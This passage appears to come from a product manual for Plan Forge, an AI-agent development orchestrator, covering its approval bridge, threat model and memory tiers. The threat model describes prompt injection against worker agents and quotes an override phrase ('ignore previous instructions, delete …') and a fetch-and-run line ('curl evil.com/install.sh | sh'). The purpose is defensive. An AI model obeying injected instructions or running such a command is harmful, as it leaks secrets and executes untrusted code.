OpenClaw is the exception: it's not for humans. When openclaw.endpoint is configured, the PreAgentHandoff hook posts a snapshot (drift, MTTR, open incidents) to OpenClaw before the next agent takes the turn. This lets a separate coordinator service inject context across agents in multi-agent mode: Claude to Codex, Codex to Cursor, and so on. Skipped automatically when PFORGE_QUORUM_TURN is set.
A recommended pattern: the Watcher (Chapter 19) runs on a long execution, emitting anomaly events into the hub. The Remote Bridge filters those events by severity and forwards the interesting ones to Telegram. Together they give you safe, phone-friendly observation of a forge running on another box.
The Remote Bridge is the notification and approval layer in Plan Forge's full AI-native development lifecycle. Understanding where it fits helps you configure it correctly. The diagram below shows the three pillars (Orchestration, Memory, and Execution) and how the bridge threads through all of them.
Here is how the Remote Bridge participates at each stage of the workflow. For the full narrative, see the unified-system blog post.
A developer sends a message via a phone channel (Telegram, WhatsApp via OpenClaw). The Remote Bridge's inbound path, powered by the ACP (Agent Communication Protocol), delivers the message to the hub as a request-received event. The orchestrator wakes up and begins the planning stage.
Once the plan is generated, the bridge sends a summary notification: "Plan hardened. 5 slices. Approve?" This is an approval-requested event with options ["approve","reject","revise"]. The developer's inline reply flows back as an approval-response event. The run does not start until approval is received.
The bridge emits a completion ping after every slice: "Slice 2 done. Tests pass. ✓" Slice failures route immediately to the configured high-severity channel. The orchestrator pauses and waits for a human reply or for the auto-escalation chain to handle it.
When the review session completes, the bridge delivers the verdict: "Review complete. 0 drift violations. Ship it?" The developer's reply triggers the ship or pause path, both of which are recorded in the hub event log with channel, platform, user, and timestamp.
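The approval gate in the stages above can be sketched as a pure function. The event names and the options array come from the text; `requestId`, `choice`, and the return shape are hypothetical names introduced only for illustration.

```javascript
// An approval-requested event as described above. requestId is a hypothetical
// correlation field; the manual does not name one.
const request = {
  type: "approval-requested",
  requestId: "req-1",
  summary: "Plan hardened. 5 slices. Approve?",
  options: ["approve", "reject", "revise"],
};

// Decide what the orchestrator may do with an inbound reply.
function resolveApproval(req, res) {
  if (res.type !== "approval-response" || res.requestId !== req.requestId) {
    return { startRun: false, reason: "unrelated-event" };
  }
  if (!req.options.includes(res.choice)) {
    return { startRun: false, reason: "unknown-option" };
  }
  // The run starts only on an explicit approve.
  return { startRun: res.choice === "approve", reason: res.choice };
}

const reply = { type: "approval-response", requestId: "req-1", choice: "approve" };
console.log(resolveApproval(request, reply));
```

Anything other than an explicit `approve` leaves the run stopped, which matches the rule that the run does not start until approval is received.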
Trust boundaries, attack surface, STRIDE per subsystem, AI-specific threats, and a hardening checklist for self-hosted deployments.
Plan Forge is a developer-machine-first tool. The default deployment puts every component (orchestrator, MCP server, REST/WebSocket hub, memory store, dashboard) on a single workstation, bound to 127.0.0.1. There is no managed cloud, no shared multi-tenant control plane, no external authentication broker. This is a deliberate posture: the threat model that applies to most users is "my own machine plus the LLM providers I call", and the entire surface is designed to keep it that small.
Even so, three configurations expand the surface and deserve explicit treatment:
docs/plans/, memory hints in .github/copilot-memory-hints.md). The shared surface is the git repository.
Plan Forge has six trust boundaries. Each is a place where data or control crosses from one trust zone to another, and therefore a place where validation, authentication, or sanitization must happen.
| Boundary | Crosses from | Crosses to | Control |
|---|---|---|---|
| 1. Workspace ↔ orchestrator | Trusted: user's IDE session | Trusted: long-running Node process | OS user; no in-process auth. |
| 2. Orchestrator ↔ LLM provider | Trusted: orchestrator | Untrusted: third-party API | TLS; API key bound by env var or .forge/secrets.json; provider's own auth. |
| 3. REST / WS hub ↔ localhost clients | Trusted: bound to 127.0.0.1 | Trusted: any process on the box | Loopback binding; no token auth by design. |
| 4. Worker ↔ plan / repo files | Trusted: orchestrator-spawned | Untrusted: file contents may include attacker text | PreToolUse hook (Forbidden Actions); scope contract. |
| 5. Hub ↔ Remote Bridge channel | Trusted: hub event | Untrusted: third-party messenger | Per-channel webhook token; outbound only by default; inbound approvals authenticated against bridge config. |
| 6. Memory L2 ↔ OpenBrain L3 | Trusted: local L2 jsonl | Untrusted: external embedding store | Opt-in (off by default); per-record redaction; memory.l3Endpoint + token in .forge.json. |
127.0.0.1. They are not hardened against network-attached attackers. If you reverse-proxy them onto a network interface, you must front them with your own auth (mTLS, OIDC, network ACL); see Hardening checklist.
Every place an attacker-controlled byte can enter the system. Catalog this before reaching for STRIDE.
| Surface | Input | Attacker class |
|---|---|---|
| REST endpoints (113 routes, Appendix W) | JSON body, query string, path params | Local process on the same box (any user with shell access). |
| WebSocket hub (:3101/hub) | Subscribe / publish frames | Same as REST. |
| MCP stdio channel | JSON-RPC method calls from the IDE | Whoever controls the IDE session (typically: the user, or a malicious extension). |
| Plan files (docs/plans/Phase-*.md) | Markdown + bash gate commands + scope contract | Anyone who can land a PR. Plan files are executable in the sense that gate commands run as the orchestrator user. |
| SKILL.md files (.github/skills/*) | Markdown + bash blocks per step | Anyone who can land a PR. Skills run with the same privileges as the orchestrator. |
| Hook scripts (.github/hooks/*) | PowerShell / bash invoked at lifecycle events | Anyone who can land a PR. Hooks run on every session start, every tool use, every commit. |
| LLM tool output (worker responses) | Free-form text, code blocks, tool calls | Indirect: an attacker who poisoned the prompt (prompt injection from a fetched URL, code comment, dependency README, etc.). |
| Extension catalog (extensions/catalog.json + installed packages) | Node packages with full file-system access | Extension author. pforge ext add implies trust. |
| Remote Bridge inbound | Approval / reject webhook calls from messengers | Anyone with the bridge token (or anyone who can spoof the messenger's HMAC if you skipped verification). |
The relevant threats per subsystem. Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege.
| Subsystem | Top threats | Mitigation |
|---|---|---|
| Orchestrator | T: tampered plan file injects malicious gate. E: skill step shells out as the user. | PR review on plan/skill changes. PreToolUse hook enforces Forbidden Actions. Gate commands run in the user's existing shell, no sandbox, so plan/skill authors are inside the TCB. |
| REST / WS hub | I: any local process can read the hub stream (run history, costs, source snippets). E: any local process can POST /api/run-plan. | Loopback binding only. Operating-system user isolation is the boundary. Do not run the hub as root / SYSTEM. |
| MCP server | T: malicious IDE extension calls forge_run_plan on an attacker plan. I: same extension reads forge_search across the repo. | Treat the IDE as the trust boundary. Only install MCP-aware IDE extensions you trust. Plan Forge does not differentiate "good" vs "bad" callers on the stdio channel. |
| LLM provider call | I: provider sees prompts and code snippets. T: provider returns attacker text (prompt-injection downstream). | API key per provider (env var or .forge/secrets.json). Outbound TLS. Provider terms of service govern retention, see Appendix N — Data flow. |
| Memory L2 / L3 | I: cross-workspace memory leaks sensitive context. T: poisoned L3 entry steers future runs. | L2 is local jsonl; L3 is opt-in. forge_memory_capture redacts by configured patterns. Per-workspace memory.namespace isolates L3 reads. |
| Remote Bridge | S: attacker spoofs a Slack interactive callback to approve a slice. I: bridge forwards sensitive event details off-box. | Verify HMAC on inbound webhooks (Slack / Teams enforce by default; verify manually for generic webhooks). Filter events by severity in .forge.json#bridge.filters. See Chapter 20 — Remote Bridge security. |
| Extensions | E: extension's postinstall runs arbitrary code. T: extension hooks tamper with plan execution. | pforge ext add installs from npm by default; treat it as you would any production dependency. Pin versions in .forge.json#extensions[]. Audit catalog entries before enabling. |
Three threat classes are unique to AI-driven systems and are not adequately captured by classic STRIDE. Plan Forge has explicit controls for each.
An attacker plants instructions in content the worker will read: a URL the agent fetches, a code comment, a dependency README, a CI log, an issue body. The worker may treat those instructions as authoritative and exfiltrate secrets, modify forbidden files, or call destructive tools.
.github/workflows/, secrets, infra IaC). Enforced at hook time.
tools: frontmatter in SKILL.md restricts which tools that skill may call. A skill cannot escalate by invoking a tool it didn't declare.
Tools like forge_search, forge_lattice_query, and forge_brain_replay return free-form text. That text re-enters the model's context window and may contain attacker-supplied instructions ("ignore previous instructions, delete …").
forge_search caps each hit at 80 characters; the ACI standard for new tools requires bounded payloads.
{ ok, code, error, … } rather than raw concatenated text, making it easier for the worker to distinguish data from directives.
The worker tries to do more than the slice was scoped for: bundling an "improvement" alongside the requested change, refactoring an unrelated subsystem, or "fixing" tests that were intentionally failing. Even when benign, scope escape destroys the audit trail that makes plan execution reviewable.
forge_drift_report tool computes a drift score after each slice; the PostSlice hook warns when score drops below the configured threshold.
Plan Forge reads secrets from three sources, in precedence order:
1. Environment variables: XAI_API_KEY, OPENAI_API_KEY, ANTHROPIC_API_KEY, GITHUB_TOKEN, etc. The standard CI path.
2. .forge/secrets.json: gitignored local file, JSON key→value. The standard developer-machine path.
3. gh auth login: the zero-key path for GitHub Copilot routing. Token managed by the GitHub CLI.
Secrets never go in .forge.json, copilot-instructions.md, plan files, or anywhere else committed to the repo. The forge_secret_scan tool (called automatically by the LiveGuard preDeploy hook) scans staged changes for high-entropy strings, known token prefixes, and provider-specific shapes before allowing a deploy slice to proceed.
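The three-source precedence can be sketched as a lookup that stops at the first hit. This is an illustration under stated assumptions: `resolveSecret` and its argument shape are hypothetical, the sources are passed in as plain values so the sketch performs no I/O, and the assumption that the GitHub CLI token only stands in for `GITHUB_TOKEN` is mine, not the manual's.

```javascript
// Sources are passed in as plain values so the sketch has no I/O:
//   env         - an object shaped like process.env
//   secretsFile - parsed contents of .forge/secrets.json, or null
//   ghToken     - a token obtained through the GitHub CLI, or null
function resolveSecret(name, { env = {}, secretsFile = null, ghToken = null }) {
  // 1. Environment variables win.
  if (env[name]) return { value: env[name], source: "env" };
  // 2. Then the gitignored local secrets file.
  if (secretsFile && secretsFile[name]) {
    return { value: secretsFile[name], source: "secrets.json" };
  }
  // 3. Assumption: the gh-managed token only substitutes for GITHUB_TOKEN.
  if (name === "GITHUB_TOKEN" && ghToken) {
    return { value: ghToken, source: "gh-cli" };
  }
  return null;
}

const found = resolveSecret("OPENAI_API_KEY", {
  env: { OPENAI_API_KEY: "from-env" },
  secretsFile: { OPENAI_API_KEY: "from-file" },
});
console.log(found.source);
```

Returning the source alongside the value makes it easy to log where a key came from without ever logging the key itself.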
git filter-repo, force-push, and notify anyone who may have pulled the leaked commit. Order matters: rewriting history does not retroactively un-leak a credential that has been mirrored or fetched.
Plan Forge has three supply-chain entry points; each has explicit controls.
| Entry point | Trust establishment | Update / verification |
|---|---|---|
| Plan Forge itself (template files, presets, prompts) | You cloned / installed from github.com/srnichols/plan-forge. | pforge self-update verifies the GitHub release tag; pforge check validates installed file checksums against the manifest. |
| Extensions (extensions/catalog.json) | Per-extension npm scope. Catalog lists publisher. | Pin version in .forge.json#extensions[]. Audit the package before pforge ext add. CI should fail on unaudited additions. |
| LLM providers | Provider TOS + your API key. | Out of scope for Plan Forge controls; managed by the provider. |
Plan Forge does not sandbox worker file edits, gate commands, skill bash blocks, or hook scripts. These run with the orchestrator process's full privileges (i.e. the user's shell privileges). This is a deliberate trade-off: the alternative is shipping a container-based execution model, which would complicate pforge run-plan by an order of magnitude and break the "feels like a normal dev tool" experience that the project optimizes for.
What this means for threat modelers:
package.json postinstall, or Makefile targets. Plan Forge adds no new sandbox, but adds no new escape either.
docs/plans/, .github/skills/, and .github/hooks/ by people who would catch curl evil.com/install.sh | sh in a regular pipeline file.
Two near-term defenses Plan Forge does provide:
statusReason: worker-signaled, see Appendix X · OS subprocess exits).
forge_secret_scan + forge_env_diff before the deploy slice and blocks on severity ≥ high.
For self-hosted deployments or shared-machine scenarios, work through this list before shipping. Each item maps to a specific control surface or configuration in .forge.json / environment variables.
| Control | Default | Production action |
|---|---|---|
| Hub bound to 127.0.0.1 | Yes | Confirm; never bind 0.0.0.0 without an auth proxy. |
| Run orchestrator as non-privileged user | User-dependent | Verify; never run as root / SYSTEM. |
| Secrets only in env or .forge/secrets.json | Yes | Audit repo with forge_secret_scan; rotate any historic leaks. |
| .forge/secrets.json gitignored | Yes (template) | Confirm .gitignore entry; CI should fail if absent. |
| PreToolUse hook installed | Yes (post-setup) | Verify .github/hooks/PreToolUse.md present; pforge smith reports it. |
| PreDeploy LiveGuard hook enabled | Configurable | Enable in .forge.json#hooks.preDeploy with severity threshold high. |
| Plan / skill / hook PR review required | User-dependent | Branch protection: require review on docs/plans/**, .github/skills/**, .github/hooks/**. |
| Extensions pinned by version | User-dependent | Pin in .forge.json#extensions[].version; CI fails on bare-name installs. |
| Remote Bridge HMAC verified | Per channel | Slack / Teams: built in. Generic webhooks: configure bridge.<channel>.signingSecret. |
| L3 memory opt-in only | Off | Leave off unless required; if on, configure per-workspace memory.namespace and redaction patterns. |
| Audit log retention configured | 30 days | Adjust .forge.json#audit.retentionDays per compliance requirement (see Appendix N — Audit logging). |
| Air-gapped deployment validated | N/A | If required, follow Appendix N — Air-gapped deployment playbook. |
When something does go wrong (a forbidden file edited, a secret leaked, a worker shipping a destructive change), the LiveGuard surface is the front door:
forge_incident_capture records the run id, slice number, affected files, and event timeline. Posts to the Remote Bridge if configured.
.forge/runs/<runId>/trajectory.jsonl contains the full worker conversation, every tool call, every event. This is the forensic record.
/audit-loop classifies the finding into bug / spec / classifier lanes and files the appropriate issue.
git revert on the slice commit. The orchestrator's commit-per-slice discipline means each slice is independently revertable.
PROJECT-PRINCIPLES.md, the plan's Temper Guards table, or a new instruction file under .github/instructions/.
The full incident-response playbooks for each LiveGuard alert class live in Appendix F · LiveGuard Alert Runbooks.
.forge.json hooks, configure preDeploy, postSlice, preAgentHandoff.
drift-detected, preDeploy-blocked, quorum-model-failed.
Three tiers, one capture path. How Plan Forge remembers what it learned, across slices, across sessions, across plans.
.forge/*.jsonl files in your repo. Your project's permanent notebook.
captureMemory() call writes to all three. If any tier fails, the others still succeed; nothing blocks your code.
And around those three tiers, v3.x added four pieces of craftsmanship: Hallmark stamps every record with a provenance envelope (hallmark/v1) so drift is detectable; Anvil hardens the L2→L3 doorway with a dead-letter queue and capability handshake so a network blip never loses a memory; Lattice sits alongside as a code-graph index the agent can query ("who calls this function?"); and forge_sync_memories pushes decisions and lessons up into Copilot's own Memory store so the next IDE session sees them automatically. The plain-English tour with numbers is in Chapter 22 — How the Shop Remembers.
forge_sync_memories)? They're covered in plain English in the next chapter, Chapter 22 — How the Shop Remembers. That chapter explains what we layered on top of the L1/L2/L3 tiers described here, and shows the cost/quality numbers proving why a cheaper model can now do work that used to require the expensive one.
Plan Forge keeps three kinds of memory separate: volatile working memory, durable project memory, and cross-project semantic memory. Every captureMemory call writes to all three in a single best-effort pass: no tier blocks the others, and no failure aborts the calling tool.
| Tier | Storage | Lifetime | Read API | What v3 added |
|---|---|---|---|---|
| L1, Hub | EventEmitter in hub.mjs + .forge/hub-events.jsonl | Process lifetime + replay file | WebSocket subscribers, forge_watch | Unchanged. Same hub, same broadcast. |
| L2, Files | .forge/*.jsonl (memory-captures, gotchas, lessons, decisions, patterns…) | Repository lifetime | forge_memory_report, manual file reads | Hallmark stamps every new record (_v:1) so drift is detectable. |
| L3, OpenBrain | pgvector via .forge/openbrain-queue.jsonl drain | Cross-project, cross-session | search_thoughts, semantic recall | Anvil hardens the doorway (DLQ + capability handshake + boot drain). |
| + Lattice | .forge/lattice/{chunks,edges}.jsonl | Repository lifetime (rebuildable) | latticeQuery, latticeCallers, latticeBlast | Parallel axis, a code-graph the agent queries alongside memory. |
| ↑ Copilot Memory | Copilot's own Memory store (IDE) | Cross-session, IDE-wide | Copilot reads automatically | forge_sync_memories pushes decisions/lessons upward (additive, hash-deduped). |
forge_sync_memories fit on top of L1/L2/L3, see Chapter 22 § How the New Pieces Fit the Old Tiers.
OpenBrain isn't just a per-session scratch pad; it's a shared memory layer that compounds across every AI agent, every IDE, and every session. When Claude captures a gotcha in Slice 2, Copilot reads it in Slice 5 without any manual handoff. When Cursor records a naming convention, Claude's next run already knows it.
capture_thought({ content, project, source, type }) after a key decision. The record is scoped to your project and the originating slice path.
.forge/openbrain-queue.jsonl) and drains it to OpenBrain asynchronously.
search_thoughts({ query, project, limit }) to surface relevant prior decisions before writing a single line of code.
| Agent | Capture path | Retrieve path | Notes |
|---|---|---|---|
| Claude | capture_thought MCP tool | search_thoughts MCP tool | Full read/write; memory-preload event on plan start |
| Cursor | capture_thought MCP tool | search_thoughts MCP tool | Background agent and composer mode both supported |
| Copilot | capture_thought MCP tool | search_thoughts MCP tool | Lifecycle hooks (SessionStart) inject prior context automatically |
| Future agents | Any MCP client | Any MCP client | MCP-capable clients connect to the same store |
Concepts in this section were first explored in the blog posts One Framework, Seven AI Agents and From WhatsApp to Shipped PR: The Unified System.
One write, three destinations. The diagram below traces a single captureMemory({tool, type, body}) call from any tool through the dual-write fan-out:
┌──────────────────────────────────────────────────────────────────────┐
│  Any forge tool, watcher, hook, or skill                             │
│    └─► captureMemory({ tool, type, body, source })                   │
└──────────────────────────────────┬───────────────────────────────────┘
                                   │
        ┌──────────────────────────┼──────────────────────────┐
        ▼                          ▼                          ▼
┌──────────────────┐    ┌─────────────────────┐   ┌────────────────────┐
│ L1, Hub          │    │ L2, Files           │   │ L3, OpenBrain      │
│                  │    │                     │   │                    │
│ EventEmitter     │    │ Append _v:1 record  │   │ Append to          │
│ broadcast        │    │ to .forge/          │   │ openbrain-         │
│                  │    │ memory-captures     │   │ queue.jsonl        │
│ → WebSocket      │    │ .jsonl              │   │                    │
│   subscribers    │    │                     │   │ Drain worker:      │
│                  │    │ Tag-route to        │   │ batch → POST       │
│ → hub-events     │    │ gotchas.jsonl,      │   │ → pgvector         │
│   .jsonl replay  │    │ lessons.jsonl,      │   │                    │
│                  │    │ decisions.jsonl…    │   │ Failures → DLQ     │
│ Real-time UI     │    │                     │   │ .jsonl             │
└──────────────────┘    └─────────────────────┘   └────────────────────┘
                                                            │
                                                            ▼
                                                ┌──────────────────────┐
                                                │ search_thoughts /    │
                                                │ buildPlanBootContext │
                                                │ → preload on plan-   │
                                                │   start (memory-     │
                                                │   preload event)     │
                                                └──────────────────────┘
Every step is wrapped in try/catch. A failed L3 enqueue never blocks the L2 file append; a corrupt L2 file never blocks the L1 broadcast. This is the dual-write pattern: best-effort fan-out with structured telemetry on each branch.
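A minimal sketch of that best-effort fan-out, assuming each tier is represented by a writer function. The `fanOut` name, the writer map, and the telemetry shape are hypothetical; the real captureMemory lives in pforge-mcp/memory.mjs and is not reproduced here.

```javascript
// Best-effort fan-out: call every tier writer and never let one failure
// stop the others. Each branch reports its own outcome.
function fanOut(record, tiers) {
  const telemetry = {};
  for (const [name, write] of Object.entries(tiers)) {
    try {
      write(record);
      telemetry[name] = { ok: true };
    } catch (err) {
      telemetry[name] = { ok: false, error: err.message };
    }
  }
  return telemetry;
}

// In-memory stand-ins for the three tiers; the L2 writer simulates a failure.
const l1 = [];
const l3Queue = [];
const result = fanOut(
  { tool: "forge_run_plan", type: "gotcha", body: "example" },
  {
    l1: (r) => l1.push(r),
    l2: () => { throw new Error("disk full"); },
    l3: (r) => l3Queue.push(r),
  }
);
console.log(result);
```

The try/catch sits inside the loop rather than around it, which is what keeps a failing branch from short-circuiting the branches after it.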
The hub is a single EventEmitter instance in pforge-mcp/hub.mjs. Every event (slice start, model choice, tool result, memory capture) flows through it:
memory-captured
.forge/hub-events.jsonl so a fresh dashboard can rebuild state on connect
Every memory file lives under .forge/ as line-delimited JSON. Each record carries a schema version field _v so the format can evolve without breaking older data:
| File | Contents |
|---|---|
| memory-captures.jsonl | Raw capture log, every captureMemory call |
| gotchas.jsonl | Type-routed: type: "gotcha" |
| lessons.jsonl | Type-routed: type: "lesson" |
| decisions.jsonl | Type-routed: type: "decision" |
| patterns.jsonl | Type-routed: type: "pattern" |
| conventions.jsonl | Type-routed: type: "convention" |
| openbrain-queue.jsonl | Pending L3 deliveries (drain worker source) |
| openbrain-dlq.jsonl | Permanently failed L3 deliveries |
| hub-events.jsonl | L1 replay log |
The Memory tab in the dashboard renders this exact set as a live KPI strip plus a per-file breakdown; see the dashboard chapter. The data comes from forge_memory_report, also exposed at GET /api/memory/report.
OpenBrain is the cross-project semantic store (pgvector + thought metadata). Plan Forge never writes to it directly during a tool call, because that would couple every tool's latency to the OpenBrain endpoint. Instead, the path goes through the Anvil boundary: a small piece of code that owns delivery, capability negotiation, and failure recovery so the calling tool only ever talks to a local queue.
captureMemory appends one line to .forge/openbrain-queue.jsonl (microseconds, local I/O)
openbrain-dlq.jsonl, the dead-letter queue that the next boot drains automatically
drain-trend rolling window in forge_memory_report exposes pass/fail/deferred counts so the Memory tab can flag a stuck pipeline
captureMemory never fails because of L3. When you later set openbrain.endpoint in .forge.json, the next drain pass ships the backlog.
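The queue-then-drain idea can be sketched with in-memory arrays standing in for the two jsonl files. How the real drain worker decides between retrying and dead-lettering is not spelled out here, so the outcome values ("ok", "reject", anything else) and the `drainQueue` helper are assumptions made for illustration; a real worker would also be asynchronous.

```javascript
// Drain the pending queue once. Delivered records are dropped, rejected
// records move to the dead-letter list, and everything else stays queued
// for the next pass. The three counters mirror pass/fail/deferred.
function drainQueue(queue, deliver) {
  const remaining = [];
  const deadLetters = [];
  const counts = { pass: 0, fail: 0, deferred: 0 };
  for (const record of queue) {
    let outcome;
    try {
      outcome = deliver(record);
    } catch {
      outcome = "retry"; // a thrown error is treated as transient
    }
    if (outcome === "ok") {
      counts.pass++;
    } else if (outcome === "reject") {
      deadLetters.push(record);
      counts.fail++;
    } else {
      remaining.push(record);
      counts.deferred++;
    }
  }
  return { remaining, deadLetters, counts };
}

const queue = [{ id: 1 }, { id: 2 }, { id: 3 }];
const outcomes = { 1: "ok", 2: "reject", 3: "retry" };
const drained = drainQueue(queue, (r) => outcomes[r.id]);
console.log(drained.counts);
```

Because the caller only ever appends to the local queue, a slow or unreachable endpoint shows up as a growing `remaining` list rather than as a failed tool call.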
When forge_run_plan emits run-started, the orchestrator calls buildPlanBootContext(plan, projectName) to derive a small set of semantic queries the agent should pre-fetch from L3 before slice 1:
plan Phase-1-AUTH), surfaces prior decisions on the same plan
database migration patterns, "api" → API endpoint design patterns), deduped and capped at 8
The hints are emitted as a memory-preload hub event. Any agent runtime listening (Copilot, Claude Code, Cursor) can resolve the hints via search_thoughts and seed its working context, eliminating the cold-start "what did we learn last time" gap.
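A rough sketch of how such hints could be derived: one query for the plan name, keyword-triggered domain queries, then dedupe and cap. `buildBootHints` and the keyword map are hypothetical. Only the "api" pairing is quoted in the text; the trigger word for "database migration patterns" is a guess, and the real buildPlanBootContext may work differently.

```javascript
// Hypothetical keyword map. Only the "api" pairing is quoted in the manual;
// the "migration" trigger is an assumption.
const KEYWORD_QUERIES = {
  api: "API endpoint design patterns",
  migration: "database migration patterns",
};
const MAX_HINTS = 8; // the cap stated in the text

function buildBootHints(planName, planText) {
  const hints = [`plan ${planName}`];
  const lower = planText.toLowerCase();
  for (const [keyword, query] of Object.entries(KEYWORD_QUERIES)) {
    if (lower.includes(keyword)) hints.push(query);
  }
  // A Set removes duplicates while preserving first-seen order.
  return [...new Set(hints)].slice(0, MAX_HINTS);
}

const hints = buildBootHints("Phase-1-AUTH", "Add an API route and a migration.");
console.log(hints);
```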
The file watcher (see the Watcher tab in chapter 6) doesn't just emit FS events; it drives capture. When a file change matches a watcher rule, the watcher composes a buildWatcherSearchPrompt payload and pushes it through the same captureMemory path so the change becomes a first-class L2 record and an L3 query.
This closes the loop where edits made between plan slices used to vanish from memory. Now the watcher feeds L1/L2/L3 just like any tool would.
Every capture carries a source field with a strict format: <tool> or <tool>/<subsystem>. validateSourceFormat rejects anything else. This means the Memory tab's "by tool" breakdown is always accurate, no untagged drift.
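A minimal sketch of such a check. The regular expression is inferred from the sample strings in this section rather than taken from the real validateSourceFormat, and `normalizeSource` is a hypothetical wrapper that shows the documented fallback to "unknown".

```javascript
// One lowercase segment, optionally followed by "/" and a second segment.
// The allowed character set is inferred from the samples, not from the code.
const SOURCE_PATTERN = /^[a-z][a-z0-9_-]*(\/[a-z][a-z0-9_-]*)?$/;

function normalizeSource(source) {
  if (typeof source === "string" && SOURCE_PATTERN.test(source)) {
    return { source, valid: true };
  }
  // Keep the capture, but tag it "unknown" so it never goes untagged.
  return { source: "unknown", valid: false };
}

for (const s of ["forge_run_plan/slice-executor", "My Tool", ""]) {
  console.log(JSON.stringify(s), normalizeSource(s));
}
```

Anchoring the pattern at both ends is what rejects strings with spaces around the slash; an unanchored pattern would match the valid prefix and let them through.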
// Valid
"forge_run_plan"
"forge_run_plan/slice-executor"
"watcher/fs-rule"
"hook/pre-deploy"
// Rejected (logged, capture still proceeds, source replaced with "unknown")
"My Tool"
"forge_run_plan / slice-executor" // spaces around slash
""
Schema changes (the _v field bumps) are handled by the migration switch in pforge.ps1 / pforge.sh:
# Inspect what would migrate (no writes)
pforge migrate-memory --dry-run
# Apply: rewrites every .forge/*.jsonl record to the latest _v
pforge migrate-memory
# Migration is idempotent, running twice is a no-op
Originals are backed up to .forge/.migration-backup-<timestamp>/ before any rewrite.
Three helpers in memory.mjs drive everything the dashboard shows:
buildCaptureTelemetry(): totals, deduped count, by-tool and by-type histograms (cosine-similarity dedup at write time)
buildCacheEntry() + isCacheEntryFresh(): search-result cache with TTL stamping (stampThoughtExpiry) and read-time filtering (filterUnexpiredThoughts)
buildMemoryReport(projectDir): assembles the full payload behind forge_memory_report / /api/memory/report: file inventory, version distribution, queue depth, drain trend, orphan detection
pforge-mcp/memory.mjs: every helper above, with inline section markers (─── G3.x ───, ─── GX.x ───)
forge_memory_report: the underlying tool (chapter 10)
📄 v2.36.0 changelog: View CHANGELOG on GitHub.
The plain-English tour of Plan Forge's upgraded memory system, and the reason a cheaper, faster model can now do work that used to require the expensive one.
Think of the forge shop. The L1/L2/L3 memory tiers are the workbench, the filing cabinet, and the library across town. They were already there. What we added is the craftsmanship around them:
| Piece | The shop metaphor | What it actually does |
|---|---|---|
| Hallmark | The maker's mark stamped into the metal, proves who forged it, when, from what stock. | A small JSON envelope (hallmark/v1) attached to every memory record and artifact. Lets any tool ask "is this still the version I think it is?" and catch drift before it bites. |
| Anvil | The anvil where everything gets struck, solid, reliable, never drops the hammer. | The boundary code that delivers L2 records to OpenBrain (L3). Adds a dead-letter queue, a capability handshake, and a boot-time drain so a network blip never loses a memory. |
| Lattice | The map of the shop, every workbench, every tool, every chain pulley, indexed by where it sits. | A code-graph index over your repo. Splits source into semantic chunks, records who-calls-whom, and answers "show me everyone who calls executeSlice" in milliseconds. |
| forge_sync_memories | The dispatch rider that carries shop news to the wider guild. | A soft-sync that copies decisions/lessons/gotchas from .forge/ into Copilot's own Memory store, so VS Code agents see them automatically next session. |
Here's what happens when pforge run-plan starts executing slice 3 of your plan. Every step touches at least one memory subsystem:
buildPlanBootContext and emits a memory-preload event with semantic queries derived from the slice's Scope Contract. The agent runtime (Copilot, Claude, Cursor) catches the event and runs search_thoughts against L3 + a latticeQuery against the code-graph. The agent now knows what prior slices learned and which files are relevant, before it reads a single line.
grep -c when piped into a brace group"), it calls capture_thought with type gotcha. The capture path stamps the record with a fresh Hallmark envelope and writes to L1 (instant), L2 (durable), and queues it for L3.
.forge/openbrain-queue.jsonl and pushes to OpenBrain. If OpenBrain is down or rejects the schema, the record lands in .forge/openbrain-dlq.jsonl instead of vanishing. The next boot drains the DLQ automatically.
latticeCallers on every function it touched. If the call graph shows an unexpected caller (a test it forgot about, or a sibling slice's import), the slice gate catches it. This is the step that prevents "I refactored X and didn't realize Y depended on it."
forge_sync_memories copies new decisions and lessons into Copilot Memory. Tomorrow's VS Code session sees them in the global memory pane without anyone running anything.
This is the part most teams don't expect.
The classic AI cost equation goes better model → fewer mistakes → less wasted spend. That's still true, but it ignores a second lever: context quality. A medium-tier model with the right context will routinely outperform a flagship model with vague context. Memory is context. And the memory upgrades make the context dramatically better.
Here's the receipt, measured on this repo over the last 90 days:
| Metric | Before the upgrades | After (current) | What it means |
|---|---|---|---|
| Drift score | 22 | 8 | Architecture decay per session, lower is better. −64%. |
| Sonnet-4.6 success rate | ~78% (estimated) | 91% (332 / 365 slices) | Cheaper model now beats what Opus did a quarter ago. |
| Cost per slice | ~$0.09 | $0.04 | Less re-reading, less back-and-forth, less escalation. ~55% cheaper. |
| Opus escalation rate | Multiple slices per plan | Zero on QA-class plans | The memory-QA plan executed 7 slices for $0.07 on Sonnet alone. |
| OpenBrain DLQ depth | N/A (would have dropped) | 0 (Anvil catches all) | Zero memories lost to transient L3 failures. |
| Telemetry dedup rate | ~0% (no dedup) | 62.5% (10 of 16) | Hallmark's content hash collapses redundant writes. |
Put bluntly: the memory upgrades subsidize the model choice. You can pick Sonnet (or another mid-tier) and let memory carry the load that used to require Opus reasoning. The savings show up in the cost ledger; the quality shows up in the drift score.
The memory subsystems are exposed through the pforge CLI and the MCP server. Here are the three you'll use most:
# What does the agent see when it asks "where is snapshot restore handled?"
pforge lattice query "snapshot restore"
# Who calls this function?
pforge lattice callers executeSlice
# What does this function call?
pforge lattice callees attachSliceSnapshotRestore
# Health of every memory surface, L2 files, OpenBrain queue, DLQ, dedup rate, orphans
pforge memory report
# 90-day trend across drift / cost / models / incidents
pforge health-trend --days 90
# Push new decisions / lessons / gotchas into Copilot's own memory store.
# Safe to re-run, dedupes by content hash.
pforge sync-memories
# Dry-run preview (shows what would be written, writes nothing)
pforge sync-memories --dry-run
The live dashboard (localhost:3100/dashboard) added an Anvil & Lattice tab when these subsystems shipped. From there you can see:
_v stamp. Should sit at 100% for newly-written records; older records may show none.
To make sure the mental model holds, here's the same picture from Chapter 21 with the new pieces drawn in:
┌─────────────────────────────────────────────────────────────────┐
│  Copilot Memory (cross-session, IDE-wide)                       │
│       ▲                                                         │
│       │ forge_sync_memories (additive, hash-deduped)            │
│  ┌────┴─────────────────────────────────────────────────────┐   │
│  │  L3, OpenBrain (pgvector, cross-project)                 │   │
│  │       ▲                                                  │   │
│  │       │ Anvil (DLQ + capability handshake + boot drain)  │   │
│  │  ┌────┴─────────────────────────────────────────────┐    │   │
│  │  │  L2, .forge/*.jsonl (Hallmark-stamped, _v:1)     │    │   │
│  │  │  L1, Hub (in-process, runId-scoped)              │    │   │
│  │  └──────────────────────────────────────────────────┘    │   │
│  └──────────────────────────────────────────────────────────┘   │
│                                                                 │
